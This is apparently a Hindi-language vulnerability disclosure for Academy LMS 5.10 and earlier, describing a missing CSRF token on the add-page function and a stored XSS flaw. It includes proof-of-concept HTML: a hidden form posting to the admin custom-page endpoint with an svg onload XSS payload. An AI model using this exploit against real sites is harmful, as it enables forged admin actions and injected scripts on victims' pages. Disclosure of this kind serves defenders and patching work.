
Academy LMS <= 5.10 CSRF / XSS
Academy LMS <= 5.10 CSRF / XSS
Academy LMS एक एप्लिकेशन है जहाँ लोग पाठ्यक्रम बना और विज्ञापित कर सकते हैं। नया पेज जोड़ने की सुविधा CSRF के प्रति संवेदनशील है क्योंकि कोई टोकन नहीं है जो इस हमले को टालने का कारण बनता है। इसके अतिरिक्त, इस पेज का उपयोग संग्रहीत XSS पेलोड लोड करने के लिए किया जा सकता है।
हमारे प्रूफ ऑफ कॉन्सेप्ट का पहला कदम प्रशासनिक उपयोगकर्ता के साथ प्लेटफ़ॉर्म में प्रमाणित करना है।
उसके बाद, उस पेज तक पहुँचें जिसमें भेद्यता का शोषण करने का कोड है, देखें कि वेबसाइट के होम पेज पर एक नया बटन जोड़ा जाएगा, जो xss पेज पर रीडायरेक्ट करेगा।
शोषण में उपयोग किया गया कोड:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/admin/custom_page/add" method="POST">
<input type="hidden" name="page_title" value="CSRF XSS" />
<input type="hidden" name="page_content" value=""><svg onload=alert(document.domain);> ;" />
<input type="hidden" name="files" value="" />
<input type="hidden" name="button_title" value="CSRF XSS" />
<input type="hidden" name="button_position" value="header" />
<input type="hidden" name="page_url" value="xss" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>